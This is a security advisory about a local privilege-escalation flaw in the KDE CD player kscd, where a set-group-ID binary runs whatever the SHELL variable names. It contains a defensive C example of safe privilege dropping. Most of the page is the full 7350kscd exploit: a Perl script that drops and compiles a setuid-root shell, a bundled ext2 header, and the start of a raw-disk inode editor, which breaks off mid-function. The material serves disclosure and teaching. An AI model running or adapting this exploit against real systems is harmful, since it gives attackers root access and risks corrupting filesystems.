kscd SHELL Environment Variable Spoofing Vulnerability

Published: 2000-05-17
Updated: 2000-05-31

Affected systems:
KDE KDE 2.0 BETA
KDE KDE 1.2
KDE KDE 1.1.1
KDE KDE 1.1
+ SuSE 6.1-6.4
Unaffected systems:
RedHat 6.1
Description:

kscd is the CD player of the KDE desktop and is shipped as part of the KDE multimedia package (kmulti). On some Linux distributions it is installed set-group-ID 'disk' by default. To open a web browser from its info menu, kscd runs a command through the shell named by the SHELL environment variable without first dropping that group privilege. An attacker who points SHELL at a program of their own therefore gets that program executed with effective group 'disk'. Group disk has read/write access to the raw block devices under /dev, which bypasses the permission checks of the mounted filesystem: the attacker can rewrite inodes on disk directly (for example, mark a file of their own set-uid root) and so obtain superuser privileges.
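The flaw is a generic one: a set-id program lets an environment variable choose the interpreter it executes. The C program below is an added example written for this page; it is not code from kscd, KDE or the advisory, and the fix that went into the updated kmulti packages is not described here. It contrasts the pattern the advisory describes with a hardened helper launcher that ignores SHELL while set-id and drops the privilege before exec. choose_shell, drop_privileges and run_helper are names chosen for the illustration.

```c
/* Added example written for this page; it is not code from kscd, KDE or the
 * advisory.  It contrasts the pattern the advisory describes (executing
 * whatever SHELL names while set-id) with a hardened helper launcher.
 * choose_shell, drop_privileges and run_helper are names chosen here. */
#define _DEFAULT_SOURCE 1
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define SAFE_SHELL "/bin/sh"

/* True when effective ids differ from the real ones, i.e. we were started
 * set-uid or set-gid and every environment variable is attacker input. */
int running_set_id(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* The kscd pattern: SHELL=/tmp/boomshell is executed with the set-id group. */
const char *choose_shell_vulnerable(const char *env_shell)
{
    return env_shell ? env_shell : SAFE_SHELL;
}

/* Hardened: never consult SHELL while set-id; otherwise accept only an
 * absolute path without whitespace and fall back to /bin/sh for the rest. */
const char *choose_shell(const char *env_shell, int set_id)
{
    if (set_id || env_shell == NULL || env_shell[0] != '/')
        return SAFE_SHELL;
    if (strpbrk(env_shell, " \t\r\n") != NULL)
        return SAFE_SHELL;
    return env_shell;
}

/* Give the set-id privilege up for good.  setregid()/setreuid() with both
 * arguments equal also overwrite the saved ids; a bare setgid(getgid()) from
 * an unprivileged euid leaves the saved gid (here: disk) regainable. */
int drop_privileges(void)
{
    gid_t rgid = getgid();
    uid_t ruid = getuid();

    if (setregid(rgid, rgid) != 0)      /* group first, while uid privilege may remain */
        return -1;
    if (setreuid(ruid, ruid) != 0)
        return -1;
    if (getegid() != rgid || geteuid() != ruid)
        return -1;
    if (rgid != 0 && setgid(0) == 0)    /* must not be able to climb back */
        return -1;
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

/* Run a fixed command through `shell`, privileges dropped in the child before
 * exec.  Returns the child's exit status, or -1 if it could not be run. */
int run_helper(const char *shell, const char *command)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(126);
        execl(shell, shell, "-c", command, (char *)NULL);
        _exit(127);                     /* exec failed */
    }
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    const char *shell;

    setenv("SHELL", "/tmp/boomshell", 1);           /* what 7350kscd does */
    printf("vulnerable choice: %s\n", choose_shell_vulnerable(getenv("SHELL")));
    printf("hardened, set-id:  %s\n", choose_shell(getenv("SHELL"), 1));

    shell = choose_shell(getenv("SHELL"), running_set_id());
    /* this demo is not set-id, so an absolute SHELL is accepted; make sure it exists */
    if (access(shell, X_OK) != 0)
        shell = SAFE_SHELL;
    return run_helper(shell, "echo helper ran as uid $(id -u) gid $(id -g)");
}
```

The order in drop_privileges matters: the group is reset first, because once the uid is unprivileged a later setgid() to a foreign group would fail, and the final setgid(0)/setuid(0) probes turn a silently incomplete drop into a hard error. The deeper fix is to not run an interactive GUI program set-id at all, so that SHELL and the rest of the environment are never trusted input.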


<* Source: Sebastian <krahmer@cs.uni-potsdam.de> *>


Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

--- 7350kscd ---
#!/usr/bin/perl
#    http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets:
#        TESO
#        security.is
#        lam3rz
#        29A
#        Mike and Silvio.
#
# Special thanx to
#
# C.P.           --     roots, bloody roots }|-]
# Michal Zalewski --    No sex causes what? I can't deciffer the pic ... :PP
#
# Description:
#
# kscd local root exploit. kscd belongs to the KDE multimedia-pack. (stupid)
# As so often with GUIs, kscd is setgid-disk and gets the shell for
# a browser-execution via the SHELL environment variable. So, we set it
# to /tmp/boomshell which will make ext2fs setgid-disk. Then we use
# ext2fs to change /tmp/boomshell to a setuid-root file via raw-filesystem
# access (we are group disk!). Please make sure you have
#
# a) ext2fs-lib installed (default)
# b) kscd setgid disk (default on SuSE 6.4 f.e.)
# c) a CD in drive (hmmm ...)
# d) /tmp points to a disk where setuids are allowed (default)
# e) brain and responsibility (unfortunately not default)
#
# Note that the change via ext2fs takes effect after next re-mount (e.g. 'reboot')
# We assume that group disk has GID 6. Change if necessary.
#
#
# Warning: You are playing with your filesystem! This can cause data-loss.
#          Use a zip-disk for playing! YOU USE IT AT YOUR OWN RISK!
#       For educational purposes only!    
#
# This exploit goes under the GPL!
#

sub usage
{
    print "Usage: $0 <device_where_tmp_is (/dev/hdaX)>\n";
    exit 0;
}

$disk = shift or usage();

$kde = $ENV{'HOME'}."/.kde/share/config/kscdrc";

unlink $kde;

`cc ext2fs.c -lext2fs -o /tmp/ext2fs`;

# create kscd config-file -- necessary
open O, ">$kde" or die "Can't open config-file of kscd!\n";
print O<<_EOF_;
# KDE Config File
[SMTP]
enabled=true
serverHost=localhost
serverPort=25
[CDDB]
CurrentServer=www.cddb.com cddbp 8880 -
HTTPProxyHost=
CDDBRemoteEnabled=0
SeverList=www.cddb.com cddbp 8880 -,
CDDBHTTPProxyEnabled=0
HTTPProxyPort=0
LocalBaseDir=/opt/kde/share/apps/kscd/cddb/
[MAGIC]
magicwidth=320
magicheight=200
magicbrightness=3
[General]
ToolTips=1
RandomPlay=0
DOCKING=1
AUTOPLAY=0
CDDevice=/dev/cdrom
CustomBroserCmd=
BackColor=0,0,0
AUTODOCK=0
Volume=40
EJECTONFINISH=0
USEKFM=0
STOPEXIT=1
LEDColor=226,224,255
UnixMailCommand=owned
_EOF_
close O;

# drop boomshell
open O, ">/tmp/boomshell.c" or die "Can't open /tmp/boomshell!\n";
print O<<_EOF_;
#include <stdio.h>
#include <unistd.h>     /* setuid, setgid, getuid, execve, chown */
#include <sys/stat.h>   /* chmod */

int main()
{
    char *a[] = {
        "/bin/bash",
        NULL
    };
    setuid(0);
    setgid(0);
    
    /* in case we are invoked by kscd */
    if (getuid() != 0) {
        chown("/tmp/ext2fs", getuid(), 6);
        chmod("/tmp/ext2fs", 02755);
        return 0;
    }

    execve(*a, a, NULL);
    return 0;
}
_EOF_
close O;

`cc /tmp/boomshell.c -o /tmp/boomshell`;

$ENV{'PATH'}="/opt/kde/bin:".$ENV{'PATH'};
$ENV{'SHELL'}="/tmp/boomshell";

print "Invoking kscd now.\n";
print "Click [i] -> [Information] -> [Ultimate Bandlist]\n";
print "Exit kscd then.\nI will do the rest.\n";

`kscd`;

print "Execute /tmp/boomshell after next reboot.\n";
# ext2fs should be setgid-disk now, which lets us make a shell suid
exec "/tmp/ext2fs", $disk, "/tmp/boomshell";

--- ext2_fs.h ---

/*
*  linux/include/linux/ext2_fs.h
*
* Copyright (C) 1992, 1993, 1994, 1995
* Remy Card (card@masi.ibp.fr)
* Laboratoire MASI - Institut Blaise Pascal
* Universite Pierre et Marie Curie (Paris VI)
*
*  from
*
*  linux/include/linux/minix_fs.h
*
*  Copyright (C) 1991, 1992  Linus Torvalds
*/

#ifndef _LINUX_EXT2_FS_H
#define _LINUX_EXT2_FS_H

#include <asm/types.h>        /* Changed from linux/types.h */

/*
* The second extended filesystem constants/structures
*/

/*
* Define EXT2FS_DEBUG to produce debug messages
*/
#undef EXT2FS_DEBUG

/*
* Define EXT2_PREALLOCATE to preallocate data blocks for expanding files
*/
#define EXT2_PREALLOCATE
#define EXT2_DEFAULT_PREALLOC_BLOCKS    8

/*
* The second extended file system version
*/
#define EXT2FS_DATE        "95/08/09"
#define EXT2FS_VERSION        "0.5b"

/*
* Debug code
*/
#if 0
#ifdef EXT2FS_DEBUG
#    define ext2_debug(f, a...)    { \
                    printk ("EXT2-fs DEBUG (%s, %d): %s:", \
                        __FILE__, __LINE__, __FUNCTION__); \
                      printk (f, ## a); \
                    }
#else
#    define ext2_debug(f, a...)    /**/
#endif
#endif

/*
* Special inodes numbers
*/
#define    EXT2_BAD_INO         1    /* Bad blocks inode */
#define EXT2_ROOT_INO         2    /* Root inode */
#define EXT2_ACL_IDX_INO     3    /* ACL inode */
#define EXT2_ACL_DATA_INO     4    /* ACL inode */
#define EXT2_BOOT_LOADER_INO     5    /* Boot loader inode */
#define EXT2_UNDEL_DIR_INO     6    /* Undelete directory inode */

/* First non-reserved inode for old ext2 filesystems */
#define EXT2_GOOD_OLD_FIRST_INO    11

/*
* The second extended file system magic number
*/
#define EXT2_SUPER_MAGIC    0xEF53

/*
* Maximal count of links to a file
*/
#define EXT2_LINK_MAX        32000

/*
* Macro-instructions used to manage several block sizes
*/
#define EXT2_MIN_BLOCK_SIZE        1024
#define    EXT2_MAX_BLOCK_SIZE        4096
#define EXT2_MIN_BLOCK_LOG_SIZE          10
#ifdef __KERNEL__
# define EXT2_BLOCK_SIZE(s)        ((s)->s_blocksize)
#else
# define EXT2_BLOCK_SIZE(s)        (EXT2_MIN_BLOCK_SIZE << (s)->s_log_block_size)
#endif
#define EXT2_ACLE_PER_BLOCK(s)        (EXT2_BLOCK_SIZE(s) / sizeof (struct ext2_acl_entry))
#define    EXT2_ADDR_PER_BLOCK(s)        (EXT2_BLOCK_SIZE(s) / sizeof (__u32))
#ifdef __KERNEL__
# define EXT2_BLOCK_SIZE_BITS(s)    ((s)->s_blocksize_bits)
#else
# define EXT2_BLOCK_SIZE_BITS(s)    ((s)->s_log_block_size + 10)
#endif
#ifdef __KERNEL__
#define    EXT2_ADDR_PER_BLOCK_BITS(s)    ((s)->u.ext2_sb.s_addr_per_block_bits)
#define EXT2_INODE_SIZE(s)        ((s)->u.ext2_sb.s_inode_size)
#define EXT2_FIRST_INO(s)        ((s)->u.ext2_sb.s_first_ino)
#else
#define EXT2_INODE_SIZE(s)    (((s)->s_rev_level == EXT2_GOOD_OLD_REV) ? \
                 EXT2_GOOD_OLD_INODE_SIZE : \
                 (s)->s_inode_size)
#define EXT2_FIRST_INO(s)    (((s)->s_rev_level == EXT2_GOOD_OLD_REV) ? \
                 EXT2_GOOD_OLD_FIRST_INO : \
                 (s)->s_first_ino)
#endif

/*
* Macro-instructions used to manage fragments
*/
#define EXT2_MIN_FRAG_SIZE        1024
#define    EXT2_MAX_FRAG_SIZE        4096
#define EXT2_MIN_FRAG_LOG_SIZE          10
#ifdef __KERNEL__
# define EXT2_FRAG_SIZE(s)        ((s)->u.ext2_sb.s_frag_size)
# define EXT2_FRAGS_PER_BLOCK(s)    ((s)->u.ext2_sb.s_frags_per_block)
#else
# define EXT2_FRAG_SIZE(s)        (EXT2_MIN_FRAG_SIZE << (s)->s_log_frag_size)
# define EXT2_FRAGS_PER_BLOCK(s)    (EXT2_BLOCK_SIZE(s) / EXT2_FRAG_SIZE(s))
#endif

/*
* ACL structures
*/
struct ext2_acl_header    /* Header of Access Control Lists */
{
    __u32    aclh_size;
    __u32    aclh_file_count;
    __u32    aclh_acle_count;
    __u32    aclh_first_acle;
};

struct ext2_acl_entry    /* Access Control List Entry */
{
    __u32    acle_size;
    __u16    acle_perms;    /* Access permissions */
    __u16    acle_type;    /* Type of entry */
    __u16    acle_tag;    /* User or group identity */
    __u16    acle_pad1;
    __u32    acle_next;    /* Pointer on next entry for the */
                    /* same inode or on next free entry */
};

/*
* Structure of a blocks group descriptor
*/
struct ext2_group_desc
{
    __u32    bg_block_bitmap;        /* Blocks bitmap block */
    __u32    bg_inode_bitmap;        /* Inodes bitmap block */
    __u32    bg_inode_table;        /* Inodes table block */
    __u16    bg_free_blocks_count;    /* Free blocks count */
    __u16    bg_free_inodes_count;    /* Free inodes count */
    __u16    bg_used_dirs_count;    /* Directories count */
    __u16    bg_pad;
    __u32    bg_reserved[3];
};

/*
* Macro-instructions used to manage group descriptors
*/
#ifdef __KERNEL__
# define EXT2_BLOCKS_PER_GROUP(s)    ((s)->u.ext2_sb.s_blocks_per_group)
# define EXT2_DESC_PER_BLOCK(s)        ((s)->u.ext2_sb.s_desc_per_block)
# define EXT2_INODES_PER_GROUP(s)    ((s)->u.ext2_sb.s_inodes_per_group)
# define EXT2_DESC_PER_BLOCK_BITS(s)    ((s)->u.ext2_sb.s_desc_per_block_bits)
#else
# define EXT2_BLOCKS_PER_GROUP(s)    ((s)->s_blocks_per_group)
# define EXT2_DESC_PER_BLOCK(s)        (EXT2_BLOCK_SIZE(s) / sizeof (struct ext2_group_desc))
# define EXT2_INODES_PER_GROUP(s)    ((s)->s_inodes_per_group)
#endif

/*
* Constants relative to the data blocks
*/
#define    EXT2_NDIR_BLOCKS        12
#define    EXT2_IND_BLOCK            EXT2_NDIR_BLOCKS
#define    EXT2_DIND_BLOCK            (EXT2_IND_BLOCK + 1)
#define    EXT2_TIND_BLOCK            (EXT2_DIND_BLOCK + 1)
#define    EXT2_N_BLOCKS            (EXT2_TIND_BLOCK + 1)

/*
* Inode flags
*/
#define    EXT2_SECRM_FL            0x00000001 /* Secure deletion */
#define    EXT2_UNRM_FL            0x00000002 /* Undelete */
#define    EXT2_COMPR_FL            0x00000004 /* Compress file */
#define EXT2_SYNC_FL            0x00000008 /* Synchronous updates */
#define EXT2_IMMUTABLE_FL        0x00000010 /* Immutable file */
#define EXT2_APPEND_FL            0x00000020 /* writes to file may only append */
#define EXT2_NODUMP_FL            0x00000040 /* do not dump file */
#define EXT2_NOATIME_FL            0x00000080 /* do not update atime */
/* Reserved for compression usage... */
#define EXT2_DIRTY_FL            0x00000100
#define EXT2_COMPRBLK_FL        0x00000200 /* One or more compressed clusters */
#define EXT2_NOCOMP_FL            0x00000400 /* Don't compress */
#define EXT2_ECOMPR_FL            0x00000800 /* Compression error */
/* End compression flags --- maybe not all used */    
#define EXT2_BTREE_FL            0x00001000 /* btree format dir */
#define EXT2_RESERVED_FL        0x80000000 /* reserved for ext2 lib */

#define EXT2_FL_USER_VISIBLE        0x00001FFF /* User visible flags */
#define EXT2_FL_USER_MODIFIABLE        0x000000FF /* User modifiable flags */

/*
* ioctl commands
*/
#define    EXT2_IOC_GETFLAGS        _IOR('f', 1, long)
#define    EXT2_IOC_SETFLAGS        _IOW('f', 2, long)
#define    EXT2_IOC_GETVERSION        _IOR('v', 1, long)
#define    EXT2_IOC_SETVERSION        _IOW('v', 2, long)

/*
* Structure of an inode on the disk
*/
struct ext2_inode {
    __u16    i_mode;        /* File mode */
    __u16    i_uid;        /* Owner Uid */
    __u32    i_size;        /* Size in bytes */
    __u32    i_atime;    /* Access time */
    __u32    i_ctime;    /* Creation time */
    __u32    i_mtime;    /* Modification time */
    __u32    i_dtime;    /* Deletion Time */
    __u16    i_gid;        /* Group Id */
    __u16    i_links_count;    /* Links count */
    __u32    i_blocks;    /* Blocks count */
    __u32    i_flags;    /* File flags */
    union {
        struct {
            __u32  l_i_reserved1;
        } linux1;
        struct {
            __u32  h_i_translator;
        } hurd1;
        struct {
            __u32  m_i_reserved1;
        } masix1;
    } osd1;                /* OS dependent 1 */
    __u32    i_block[EXT2_N_BLOCKS];/* Pointers to blocks */
    __u32    i_version;    /* File version (for NFS) */
    __u32    i_file_acl;    /* File ACL */
    __u32    i_dir_acl;    /* Directory ACL */
    __u32    i_faddr;    /* Fragment address */
    union {
        struct {
            __u8    l_i_frag;    /* Fragment number */
            __u8    l_i_fsize;    /* Fragment size */
            __u16    i_pad1;
            __u32    l_i_reserved2[2];
        } linux2;
        struct {
            __u8    h_i_frag;    /* Fragment number */
            __u8    h_i_fsize;    /* Fragment size */
            __u16    h_i_mode_high;
            __u16    h_i_uid_high;
            __u16    h_i_gid_high;
            __u32    h_i_author;
        } hurd2;
        struct {
            __u8    m_i_frag;    /* Fragment number */
            __u8    m_i_fsize;    /* Fragment size */
            __u16    m_pad1;
            __u32    m_i_reserved2[2];
        } masix2;
    } osd2;                /* OS dependent 2 */
};

#define i_size_high    i_dir_acl

#if defined(__KERNEL__) || defined(__linux__)
#define i_reserved1    osd1.linux1.l_i_reserved1
#define i_frag        osd2.linux2.l_i_frag
#define i_fsize        osd2.linux2.l_i_fsize
#define i_reserved2    osd2.linux2.l_i_reserved2

#elif defined(__GNU__)
#define i_translator    osd1.hurd1.h_i_translator
#define i_frag        osd2.hurd2.h_i_frag
#define i_fsize        osd2.hurd2.h_i_fsize
#define i_uid_high    osd2.hurd2.h_i_uid_high
#define i_gid_high    osd2.hurd2.h_i_gid_high
#define i_author    osd2.hurd2.h_i_author

#elif defined (__masix__)
#define i_reserved1    osd1.masix1.m_i_reserved1
#define i_frag        osd2.masix2.m_i_frag
#define i_fsize        osd2.masix2.m_i_fsize
#define i_reserved2    osd2.masix2.m_i_reserved2
#endif /* defined(__KERNEL__) || defined(__linux__) */

/*
* File system states
*/
#define    EXT2_VALID_FS            0x0001    /* Unmounted cleanly */
#define    EXT2_ERROR_FS            0x0002    /* Errors detected */

/*
* Mount flags
*/
#define EXT2_MOUNT_CHECK_NORMAL        0x0001    /* Do some more checks */
#define EXT2_MOUNT_CHECK_STRICT        0x0002    /* Do again more checks */
#define EXT2_MOUNT_CHECK        (EXT2_MOUNT_CHECK_NORMAL | \
                     EXT2_MOUNT_CHECK_STRICT)
#define EXT2_MOUNT_GRPID        0x0004    /* Create files with directory's group */
#define EXT2_MOUNT_DEBUG        0x0008    /* Some debugging messages */
#define EXT2_MOUNT_ERRORS_CONT        0x0010    /* Continue on errors */
#define EXT2_MOUNT_ERRORS_RO        0x0020    /* Remount fs ro on errors */
#define EXT2_MOUNT_ERRORS_PANIC        0x0040    /* Panic on errors */
#define EXT2_MOUNT_MINIX_DF        0x0080    /* Mimics the Minix statfs */

#define clear_opt(o, opt)        o &= ~EXT2_MOUNT_##opt
#define set_opt(o, opt)            o |= EXT2_MOUNT_##opt
#define test_opt(sb, opt)        ((sb)->u.ext2_sb.s_mount_opt & \
                     EXT2_MOUNT_##opt)
/*
* Maximal mount counts between two filesystem checks
*/
#define EXT2_DFL_MAX_MNT_COUNT        20    /* Allow 20 mounts */
#define EXT2_DFL_CHECKINTERVAL        0    /* Don't use interval check */

/*
* Behaviour when detecting errors
*/
#define EXT2_ERRORS_CONTINUE        1    /* Continue execution */
#define EXT2_ERRORS_RO            2    /* Remount fs read-only */
#define EXT2_ERRORS_PANIC        3    /* Panic */
#define EXT2_ERRORS_DEFAULT        EXT2_ERRORS_CONTINUE

/*
* Structure of the super block
*/
struct ext2_super_block {
    __u32    s_inodes_count;        /* Inodes count */
    __u32    s_blocks_count;        /* Blocks count */
    __u32    s_r_blocks_count;    /* Reserved blocks count */
    __u32    s_free_blocks_count;    /* Free blocks count */
    __u32    s_free_inodes_count;    /* Free inodes count */
    __u32    s_first_data_block;    /* First Data Block */
    __u32    s_log_block_size;    /* Block size */
    __s32    s_log_frag_size;    /* Fragment size */
    __u32    s_blocks_per_group;    /* # Blocks per group */
    __u32    s_frags_per_group;    /* # Fragments per group */
    __u32    s_inodes_per_group;    /* # Inodes per group */
    __u32    s_mtime;        /* Mount time */
    __u32    s_wtime;        /* Write time */
    __u16    s_mnt_count;        /* Mount count */
    __s16    s_max_mnt_count;    /* Maximal mount count */
    __u16    s_magic;        /* Magic signature */
    __u16    s_state;        /* File system state */
    __u16    s_errors;        /* Behaviour when detecting errors */
    __u16    s_minor_rev_level;     /* minor revision level */
    __u32    s_lastcheck;        /* time of last check */
    __u32    s_checkinterval;    /* max. time between checks */
    __u32    s_creator_os;        /* OS */
    __u32    s_rev_level;        /* Revision level */
    __u16    s_def_resuid;        /* Default uid for reserved blocks */
    __u16    s_def_resgid;        /* Default gid for reserved blocks */
    /*
     * These fields are for EXT2_DYNAMIC_REV superblocks only.
     *
     * Note: the difference between the compatible feature set and
     * the incompatible feature set is that if there is a bit set
     * in the incompatible feature set that the kernel doesn't
     * know about, it should refuse to mount the filesystem.
     *
     * e2fsck's requirements are more strict; if it doesn't know
     * about a feature in either the compatible or incompatible
     * feature set, it must abort and not try to meddle with
     * things it doesn't understand...
     */
    __u32    s_first_ino;         /* First non-reserved inode */
    __u16   s_inode_size;         /* size of inode structure */
    __u16    s_block_group_nr;     /* block group # of this superblock */
    __u32    s_feature_compat;     /* compatible feature set */
    __u32    s_feature_incompat;     /* incompatible feature set */
    __u32    s_feature_ro_compat;     /* readonly-compatible feature set */
    __u8    s_uuid[16];        /* 128-bit uuid for volume */
    char    s_volume_name[16];     /* volume name */
    char    s_last_mounted[64];     /* directory where last mounted */
    __u32    s_algorithm_usage_bitmap; /* For compression */
    /*
     * Performance hints.  Directory preallocation should only
     * happen if the EXT2_COMPAT_PREALLOC flag is on.
     */
    __u8    s_prealloc_blocks;    /* Nr of blocks to try to preallocate*/
    __u8    s_prealloc_dir_blocks;    /* Nr to preallocate for dirs */
    __u16    s_padding1;
    __u32    s_reserved[204];    /* Padding to the end of the block */
};

#ifdef __KERNEL__
#define EXT2_SB(sb)    (&((sb)->u.ext2_sb))
#else
/* Assume that user mode programs are passing in an ext2fs superblock, not
* a kernel struct super_block.  This will allow us to call the feature-test
* macros from user land. */
#define EXT2_SB(sb)    (sb)
#endif

/*
* Codes for operating systems
*/
#define EXT2_OS_LINUX        0
#define EXT2_OS_HURD        1
#define EXT2_OS_MASIX        2
#define EXT2_OS_FREEBSD        3
#define EXT2_OS_LITES        4

/*
* Revision levels
*/
#define EXT2_GOOD_OLD_REV    0    /* The good old (original) format */
#define EXT2_DYNAMIC_REV    1     /* V2 format w/ dynamic inode sizes */

#define EXT2_CURRENT_REV    EXT2_GOOD_OLD_REV
#define EXT2_MAX_SUPP_REV    EXT2_DYNAMIC_REV

#define EXT2_GOOD_OLD_INODE_SIZE 128

/*
* Feature set definitions
*/

#define EXT2_HAS_COMPAT_FEATURE(sb,mask)            \
    ( EXT2_SB(sb)->s_feature_compat & (mask) )
#define EXT2_HAS_RO_COMPAT_FEATURE(sb,mask)            \
    ( EXT2_SB(sb)->s_feature_ro_compat & (mask) )
#define EXT2_HAS_INCOMPAT_FEATURE(sb,mask)            \
    ( EXT2_SB(sb)->s_feature_incompat & (mask) )

#define EXT2_FEATURE_COMPAT_DIR_PREALLOC    0x0001

#define EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER    0x0001
#define EXT2_FEATURE_RO_COMPAT_LARGE_FILE    0x0002
#define EXT2_FEATURE_RO_COMPAT_BTREE_DIR    0x0004

#define EXT2_FEATURE_INCOMPAT_COMPRESSION    0x0001
#define EXT2_FEATURE_INCOMPAT_FILETYPE        0x0002

#define EXT2_FEATURE_COMPAT_SUPP    0
#define EXT2_FEATURE_INCOMPAT_SUPP    EXT2_FEATURE_INCOMPAT_FILETYPE
#define EXT2_FEATURE_RO_COMPAT_SUPP    (EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER| \
                     EXT2_FEATURE_RO_COMPAT_LARGE_FILE| \
                     EXT2_FEATURE_RO_COMPAT_BTREE_DIR)

/*
* Default values for user and/or group using reserved blocks
*/
#define    EXT2_DEF_RESUID        0
#define    EXT2_DEF_RESGID        0

/*
* Structure of a directory entry
*/
#define EXT2_NAME_LEN 255

struct ext2_dir_entry {
    __u32    inode;            /* Inode number */
    __u16    rec_len;        /* Directory entry length */
    __u16    name_len;        /* Name length */
    char    name[EXT2_NAME_LEN];    /* File name */
};

/*
* The new version of the directory entry.  Since EXT2 structures are
* stored in intel byte order, and the name_len field could never be
* bigger than 255 chars, it's safe to reclaim the extra byte for the
* file_type field.
*/
struct ext2_dir_entry_2 {
    __u32    inode;            /* Inode number */
    __u16    rec_len;        /* Directory entry length */
    __u8    name_len;        /* Name length */
    __u8    file_type;
    char    name[EXT2_NAME_LEN];    /* File name */
};

/*
* Ext2 directory file types.  Only the low 3 bits are used.  The
* other bits are reserved for now.
*/
#define EXT2_FT_UNKNOWN        0
#define EXT2_FT_REG_FILE    1
#define EXT2_FT_DIR        2
#define EXT2_FT_CHRDEV        3
#define EXT2_FT_BLKDEV         4
#define EXT2_FT_FIFO        5
#define EXT2_FT_SOCK        6
#define EXT2_FT_SYMLINK        7

#define EXT2_FT_MAX        8

/*
* EXT2_DIR_PAD defines the directory entries boundaries
*
* NOTE: It must be a multiple of 4
*/
#define EXT2_DIR_PAD             4
#define EXT2_DIR_ROUND             (EXT2_DIR_PAD - 1)
#define EXT2_DIR_REC_LEN(name_len)    (((name_len) + 8 + EXT2_DIR_ROUND) & \
                     ~EXT2_DIR_ROUND)

#ifdef __KERNEL__
/*
* Function prototypes
*/

/*
* Ok, these declarations are also in <linux/kernel.h> but none of the
* ext2 source programs needs to include it so they are duplicated here.
*/
# define NORET_TYPE    /**/
# define ATTRIB_NORET  __attribute__((noreturn))
# define NORET_AND     noreturn,

/* acl.c */
extern int ext2_permission (struct inode *, int);

/* balloc.c */
extern int ext2_new_block (const struct inode *, unsigned long,
               __u32 *, __u32 *, int *);
extern void ext2_free_blocks (const struct inode *, unsigned long,
                  unsigned long);
extern unsigned long ext2_count_free_blocks (struct super_block *);
extern void ext2_check_blocks_bitmap (struct super_block *);

/* bitmap.c */
extern unsigned long ext2_count_free (struct buffer_head *, unsigned);

/* dir.c */
extern int ext2_check_dir_entry (const char *, struct inode *,
                 struct ext2_dir_entry_2 *, struct buffer_head *,
                 unsigned long);

/* file.c */
extern int ext2_read (struct inode *, struct file *, char *, int);
extern int ext2_write (struct inode *, struct file *, char *, int);

/* fsync.c */
extern int ext2_sync_file (struct file *, struct dentry *);

/* ialloc.c */
extern struct inode * ext2_new_inode (const struct inode *, int, int *);
extern void ext2_free_inode (struct inode *);
extern unsigned long ext2_count_free_inodes (struct super_block *);
extern void ext2_check_inodes_bitmap (struct super_block *);

/* inode.c */
extern int ext2_bmap (struct inode *, int);

extern struct buffer_head * ext2_getblk (struct inode *, long, int, int *);
extern struct buffer_head * ext2_bread (struct inode *, int, int, int *);

extern int ext2_getcluster (struct inode * inode, long block);
extern void ext2_read_inode (struct inode *);
extern void ext2_write_inode (struct inode *);
extern void ext2_put_inode (struct inode *);
extern void ext2_delete_inode (struct inode *);
extern int ext2_sync_inode (struct inode *);
extern void ext2_discard_prealloc (struct inode *);

/* ioctl.c */
extern int ext2_ioctl (struct inode *, struct file *, unsigned int,
               unsigned long);

/* namei.c */
extern void ext2_release (struct inode *, struct file *);
extern int ext2_lookup (struct inode *, struct dentry *);
extern int ext2_create (struct inode *,struct dentry *,int);
extern int ext2_mkdir (struct inode *,struct dentry *,int);
extern int ext2_rmdir (struct inode *,struct dentry *);
extern int ext2_unlink (struct inode *,struct dentry *);
extern int ext2_symlink (struct inode *,struct dentry *,const char *);
extern int ext2_link (struct dentry *, struct inode *, struct dentry *);
extern int ext2_mknod (struct inode *, struct dentry *, int, int);
extern int ext2_rename (struct inode *, struct dentry *,
            struct inode *, struct dentry *);

/* super.c */
extern void ext2_error (struct super_block *, const char *, const char *, ...)
    __attribute__ ((format (printf, 3, 4)));
extern NORET_TYPE void ext2_panic (struct super_block *, const char *,
                   const char *, ...)
    __attribute__ ((NORET_AND format (printf, 3, 4)));
extern void ext2_warning (struct super_block *, const char *, const char *, ...)
    __attribute__ ((format (printf, 3, 4)));
extern void ext2_put_super (struct super_block *);
extern void ext2_write_super (struct super_block *);
extern int ext2_remount (struct super_block *, int *, char *);
extern struct super_block * ext2_read_super (struct super_block *,void *,int);
extern int init_ext2_fs(void);
extern int ext2_statfs (struct super_block *, struct statfs *, int);

/* truncate.c */
extern void ext2_truncate (struct inode *);

/*
* Inodes and files operations
*/

/* dir.c */
extern struct inode_operations ext2_dir_inode_operations;

/* file.c */
extern struct inode_operations ext2_file_inode_operations;

/* symlink.c */
extern struct inode_operations ext2_symlink_inode_operations;

#endif    /* __KERNEL__ */

#endif    /* _LINUX_EXT2_FS_H */


--- ext2fs.c ---


/* This file belongs to the kscd-hack. Do not use it at all,
* it is called by the perl-script.
* FOR EDUCATIONAL PURPOSES ONLY!
* YOU USE IT AT YOUR OWN RISK!
*/
#include <stdio.h>
#include <stdlib.h>     /* exit */
#include "ext2_fs.h"
#include <ext2fs/ext2fs.h>
#include <ext2fs/ext2_io.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/types.h>
#include <errno.h>
#include <string.h>

void usage(char *s)
{
    fprintf(stderr, "Man, use it like this: %s <filesystem> <file>\n", s);
    exit(1);
}

int main(int argc, char **argv)
{
    
    ext2_filsys fsd;
    struct stat st;
    struct ext2_inode stealth_inode;
    int i;
    
    if (argc < 3)
        usage(argv[0]);

    /* Fetch inode# */
    if (stat(argv[2], &st) < 0) {
        perror("stat");
        exit(errno);
    }

    for (i = 0; i < 10; i++)
        sync();
    
    if (ext2fs_open(argv[1], EXT2_FLAG_RW /* open RW */, 0 /* use def. superblock */, 0 /* def.size */,
                unix_io_manager /* default manager */, &fsd) != 0) {
            
        fprintf(stderr, "Error opening %s-FS\n", argv[1]);
        exit(errno);
    }
    printf("Your fuxoring inode-number is %lu\n", (unsigned long)st.st_ino);
    if (ext2fs_read_inode(fsd, st.st_ino, &stealth_inode) != 0) {
        fprintf(stderr, "Error reading inode.\n");
        exit(1);
